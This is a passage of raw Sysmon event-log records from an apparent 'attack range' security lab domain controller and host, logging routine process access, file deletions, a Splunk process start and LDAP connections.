Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000046347Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:33.718{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-D9F1-63C7-0100-00000000AF02}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\kerberos.DLL+97b62|C:\Windows\system32\kerberos.DLL+79e38|C:\Windows\system32\kerberos.DLL+144ff|C:\Windows\system32\lsasrv.dll+2fa11|C:\Windows\system32\lsasrv.dll+2d8f6|C:\Windows\system32\lsasrv.dll+33189|C:\Windows\system32\lsasrv.dll+30ad7|C:\Windows\system32\lsasrv.dll+2fa11|C:\Windows\system32\lsasrv.dll+17a7d|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e 10341000x800000000000000046346Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:33.602{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624664C:\Windows\system32\lsass.exe{FE4C2B44-D9F5-63C7-1600-00000000AF02}1296C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000046345Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:33.602{FE4C2B44-D9F3-63C7-0B00-00000000AF02}6242204C:\Windows\system32\lsass.exe{FE4C2B44-D9F5-63C7-1600-00000000AF02}1296C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x800000000000000046344Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:33.461{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BF89D72C37E47FB1C117203DC05AF7CF,SHA256=CE3ECD4BAFB3F8E4FAB5ED5E3E126ED73493C5204CD79DB0FC0344E929B37396,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000018599Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:33.139{E5A8D418-E62C-63C7-3A02-00000000B002}3721408C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+606005|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+605b36|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+75996|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+9dd220|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000046343Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:33.196{FE4C2B44-E62D-63C7-8506-00000000AF02}1888824C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+610325|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+60fe56|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+60943|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+60f97|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+9e7f20|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000046342Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:33.053{FE4C2B44-DA67-63C7-AE00-00000000AF02}49123668C:\Windows\system32\conhost.exe{FE4C2B44-E62D-63C7-8506-00000000AF02}1888C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000046341Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:33.053{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326420C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000046340Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:33.053{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326420C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000046339Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:33.053{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326420C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000046338Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:33.053{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326420C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000046337Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:33.053{FE4C2B44-D9F3-63C7-0500-00000000AF02}408524C:\Windows\system32\csrss.exe{FE4C2B44-E62D-63C7-8506-00000000AF02}1888C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000046336Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:33.053{FE4C2B44-DA67-63C7-AA00-00000000AF02}20924876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{FE4C2B44-E62D-63C7-8506-00000000AF02}1888C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000046335Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:33.054{FE4C2B44-E62D-63C7-8506-00000000AF02}1888C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.2.5Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{FE4C2B44-D9F3-63C7-E703-000000000000}0x3e70SystemMD5=C8BED8D054FDE4C4222F39C750539874,SHA256=765D1E768D7027343C681DF3B2F6113ED0337F7179CDAE9CF89979A8725CE490,IMPHASH=5DCBAD7446F97D73DA1DA121D8CD8778{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000046385Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:34.983{FE4C2B44-E326-63C7-F905-00000000AF02}3260ATTACKRANGE\AdministratorC:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exeC:\Users\Administrator\AppData\Roaming\Foxit Software\Foxit PDF Reader\StartPage 12.1.0\Advertisement\ad.db-journalMD5=E0CF64A651815C0360A27C31A2F0C677,SHA256=B2CDC921F88F7E529C657BEBFF707F897285729C942D8C963C7D420F52EBC156,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000046384Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:34.974{FE4C2B44-E326-63C7-F905-00000000AF02}3260ATTACKRANGE\AdministratorC:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exeC:\Users\Administrator\AppData\Roaming\Foxit Software\Foxit PDF Reader\StartPage 12.1.0\Advertisement\ad.db-journalMD5=537D8B9504BDA63842AB96A60E6DB47C,SHA256=7D6BDA42664AA645180B6198B42C4EEF7EB14FAE63C9AEDE38CFB6570360E9BF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000046383Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:34.787{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E606-63C7-7F06-00000000AF02}7140C:\Windows\system32\wbem\wmiprvse.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000046382Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:34.780{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E474-63C7-2806-00000000AF02}7096C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000046381Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:34.776{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E474-63C7-2706-00000000AF02}704C:\Program Files\Internet Explorer\iexplore.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 354300x800000000000000046380Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:33.075{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:8599:7e7b:594b:6e25win-dc-ctus-attack-range-271.attackrange.local56462-truefe80:0:0:0:8599:7e7b:594b:6e25win-dc-ctus-attack-range-271.attackrange.local389ldap 354300x800000000000000046379Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:33.075{FE4C2B44-D9F5-63C7-1600-00000000AF02}1296C:\Windows\System32\svchost.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:8599:7e7b:594b:6e25win-dc-ctus-attack-range-271.attackrange.local56462-truefe80:0:0:0:8599:7e7b:594b:6e25win-dc-ctus-attack-range-271.attackrange.local389ldap 10341000x800000000000000046378Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:34.767{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000046377Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:34.766{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E317-63C7-ED05-00000000AF02}6268C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReaderUpdateService.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000046376Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:34.766{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E0D1-63C7-5E05-00000000AF02}5280C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000046375Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:34.765{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E0D1-63C7-5D05-00000000AF02}4176C:\Windows\system32\cmd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000046374Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:34.759{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DE09-63C7-F204-00000000AF02}5228C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000046373Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:34.748{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DE08-63C7-EF04-00000000AF02}6056C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000046372Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:34.728{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000046371Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:34.721{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF7-63C7-B504-00000000AF02}1332C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000046370Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:34.713{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF7-63C7-B104-00000000AF02}5076C:\Windows\System32\rdpclip.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000046369Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:34.709{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program 